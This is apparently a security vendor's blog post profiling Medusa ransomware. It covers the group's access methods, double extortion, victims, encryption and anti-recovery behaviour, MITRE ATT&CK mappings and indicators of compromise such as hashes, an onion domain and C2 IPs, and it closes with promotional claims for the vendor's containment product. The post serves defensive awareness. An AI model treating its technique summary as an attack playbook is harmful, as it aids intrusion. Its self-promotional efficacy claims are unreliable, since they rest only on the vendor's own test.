Medusa Ransomware: What It Is and How Xcitium Keeps You Safe

Medusa ransomware is a rising ransomware-as-a-service threat leveraging double extortion tactics.

Introduction

A new ransomware variant known as Medusa Ransomware is quickly growing in notoriety as it uses aggressive double extortion methods combined with the expanding Ransomware as a Service (RaaS) model. Interestingly, the malware encrypts data as well as exfiltrates data that is usually sensitive. This means that if a business does not pay to prevent public data disclosure, they could not only be dealing with business disruption but also with repercussions because of potential data violations at the hands of the destructive Medusa gang. It is curious to note that the rise of the Medusa gang is part of the increasing rate of ransomware attacks.

Medusa’s Rise Amid a Ransomware Surge

The global number of recorded ransomware attacks increased exponentially. This is evident with the rise of Medusa. It is essential to note that the first recorded attack associated with the Medusa ransomware occurred midway through 2021. By 2023, it had developed to rank among the top ten ransomware malware operators. Also, within the first quarter of 2025, there had been more than double the recorded cases of ransomware attacks reported during the first quarter of the past year. As a result, the disruption of the leading actors in the market like LockBit and ALPHV in 2024 left space for new players like Medusa to take advantage of. Its business model involved external developers to increase the attack rate with control over the negotiations.

Interestingly, the Medusa malware is independent and does not have affiliations with other malware families despite similar names. This is not to be confused with the old Medusa Locker malware or the mobile malware of a similar name. Intelligence indicates that this threat actor is probably operating out of Russia or the affiliated regions. This malware does not target Russian or CIS-based organizations. It can usually be found in Russian-speaking cybercrime forums. By 2025, the U.S. authorities had identified Medusa as a serious threat. As such, the FBI and CISA released a joint advisory.

How Medusa Ransomware Works

  • Initial Access: In numerous cases, Medusa uses initial access obtained or bought from Initial Access Brokers (IABs) who have stolen it. The primary means cyber-criminals employ to carry out their goals include stealing login credentials by fishing, credential stuffing, or simply exploiting known vulnerabilities. Afterward, they offer or resell the stolen login information to hackers such as those from the gang known as Medusa. On the other hand, members of the gang exploit security vulnerabilities in software common in their targets’ systems to gain entry. Some of their entry vulnerabilities include CVE-2024-1709 and CVE-2023-48788 related to ScreenConnect remote control software and Fortinet products respectively. Also included among their entry means is the fishing attack.
  • Inside the Network: Once the attackers have gained entry into the network of their target victim, they immediately focus on increasing their privileges and identifying valuable data. The attackers begin scanning the data for sensitive files. Prior to the execution of the encryption function, the attackers begin exfiltrating data through secure communication protocols such as Tor or even through the usage of PowerShell. Once the encryption is initiated, it results in adding a “.MEDUSA” extension to every file belonging to the target. This is done after the attackers have exfiltrated or stolen vital data.
  • Ransom Demand: A note named “!!!READ_ME_MEDUSA!!!.txt” is displayed on compromised computers. This note includes the details of communication with the attackers and their designated victim ID. It also carries threatening messages. The attackers give their victims 48 hours to respond to their demands. If the organization is not heard from within 48 hours, the attackers modify their strategy. The attackers reach out to their victims directly through calls or emails. These actions serve to raise the pressure. The attackers display information about the breach on the Medusa leak site. The stolen data is sold to potential attackers or bidders. This is because the attacker had claimed that the initial negotiator stole their funds. It is important to note that they demanded additional money for the “true” decryption key. This is a grave indicator of their merciless nature.

Notable Medusa Ransomware Attacks

Medusa has affected numerous business entities in diverse industries and across multiple continents, evidencing the indiscriminate nature of the gang. At the beginning of 2025, the gang and its affiliates had affected more than 300 victims in crucial business areas such as education, health services, legal services, insurance services, technology, and manufacturing. For instance, in 2023 alone, the world witnessed the massive attack conducted by the notorious gang known as Medusa at the Minneapolis Public Schools. This attack led to the leakage of crucial information from more than 100,000 people, including the psychological tests undertaken by students.

Even government and public sector entities have been affected. This is because Medusa operatives have attacked government agencies in the Pacific island nation of Tonga, several municipalities within France, and another government office in the Philippines. Other government agencies in Illinois and Texas within the USA have also been affected by the Medusa ransomware attack. This indicates that the attackers can target critical infrastructure. Even vital services can be threatened.

Private companies are no less vulnerable. A case to note is a technology firm co-founded by two of Canada’s largest banks that was listed on the leak site by Medusa. Also operating with subtle extortion against small to medium-sized companies in the Americas and Asia is Medusa. The overall reach of their potential target list makes it clear that no business is immune to their activities. This is just another reason why every industry needs to be prepared for a potential attack like the one perpetrated by Medusa.

Technical Analysis Summary

The Medusa encryptor (often gaze.exe) locks victim files with AES-256, appending a .MEDUSA extension. Before encryption it halts services and deletes Volume Shadow Copies (T1490) to prevent recovery. It also disables endpoint defenses via techniques like BYOVD. Key behaviors include:

  • Encryption: AES-256 symmetric encryption; encrypted files use “.MEDUSA” extension.
  • Payload behavior: Terminates system services and security processes, deletes shadow copies (VSS) to thwart recovery.
  • Persistence: Writes a registry Run key (HKLM\…\MDSLK) and may create new accounts (T1136.002) for continued access.
  • Lateral movement: Uses Remote Desktop (T1021.001) and PsExec (T1569.002) to spread the encryptor across networks.

MITRE ATT&CK Tactics, Techniques, and Procedures (TTPs)

Medusa’s attack chain maps to multiple MITRE ATT&CK tactics. Key mapped techniques include:

  • Initial Access (TA0001): Exploit Public-Facing Application (T1190), Phishing (T1566).
  • Defense Evasion (TA0005): Clear command history (T1070.003), obfuscated scripts (T1027/T1027.013), disabling security tools (T1562.001).
  • Discovery (TA0007): Network/service and system discovery (T1046, T1135, T1082, T1083).
  • Credential Access (TA0006): OS credential dumping (LSASS memory, T1003.001).
  • Lateral Movement (TA0008): RDP (T1021.001), PsExec (T1569.002), WMI (T1047), PowerShell (T1059.001).
  • Exfiltration (TA0010): Cloud storage exfiltration via Rclone (T1567.002).
  • Command & Control (TA0011): HTTPS tunnels (T1071.001) and remote access software (T1219).
  • Persistence (TA0003): Create account (T1136.002).
  • Impact (TA0040): Data encryption (T1486) and recovery inhibition (T1490).

Indicators of Compromise (IOCs)

Medusa ransomware infections produce distinctive IOCs in files and network traffic. Malicious filenames include !!!READ_ME_MEDUSA!!!.txt (ransom note) and executables like gaze.exe and svhost.exe. Encrypted files typically use the extensions .MEDUSA or .mylock. Key examples include:

  • Files: e.g. !!!READ_ME_MEDUSA!!!.txt (ransom note), gaze.exe (PDQ deployer), svhost.exe.
  • File hashes: SHA256 657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980 plus many others.
  • Domains/URLs: e.g. Tor hidden service medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion, and go-sw6-02.adventos[.]de.
  • IP addresses: Known C2 IPs such as 195.123.246.138 and 185.220.100.249.

Case Study: Xcitium vs. Medusa Ransomware

In a recent controlled test, the advanced endpoint security offering from Xcitium proved its exceptional ability in fending off Medusa ransomware attacks, which are notorious for employing double extortion methods and clever encryption techniques. During this test, Medusa was trying to breach and encrypt system files when it was immediately quarantined by a ZeroDwell Containment technology patented by Xcitium before it was given a chance to execute its payload.

This strategic form of pre-execution containment by Xcitium prevented data loss, system damage, and improper encryption of data without interrupting business activities. This successful elimination of Medusa attests that nothing is better at preventing ransomware than Xcitium’s expertise in combating ransomware threats before they lead to system/hardware damage.

Conclusion: Xcitium ZeroDwell – Proactive Ransomware Defense

Xcitium’s patented “ZeroDwell” technology is able to prevent threats such as “Medusa” ransomware in real time by containing unknown files and processes within a secure virtual environment. This means that no matter what vigilance is taken in detecting a phishing attack or zero-day exploit, the actual malware is still thwarted. This takes place in a containment in which it is not able to affect the host machine. Thus, there is no dwell time for the malware within the network because it is not able to encrypt data or communicate with the C2 servers.

Since Xcitium is focused on runtime containment and not merely signature-based detection, it actively prevents ransomware and other forms of advanced attacks from causing damage to systems. In today’s world, with aggressive RaaS operations like that of Medusa on the rise, such real-time security is crucial. Organizations utilizing ZeroDwell-based containment solutions in conjunction with proper cybersecurity practices are likely to be safer against the potential threat of Medusa ransomware.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top